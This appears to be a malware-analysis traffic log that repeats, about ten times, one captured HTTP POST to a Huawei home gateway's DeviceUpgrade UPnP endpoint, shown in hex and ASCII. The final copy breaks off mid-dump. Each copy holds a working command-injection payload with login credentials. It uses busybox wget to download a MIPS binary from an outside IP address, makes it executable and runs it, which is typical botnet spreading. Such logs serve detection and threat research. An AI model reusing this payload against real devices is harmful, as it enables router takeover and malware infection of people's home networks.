Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 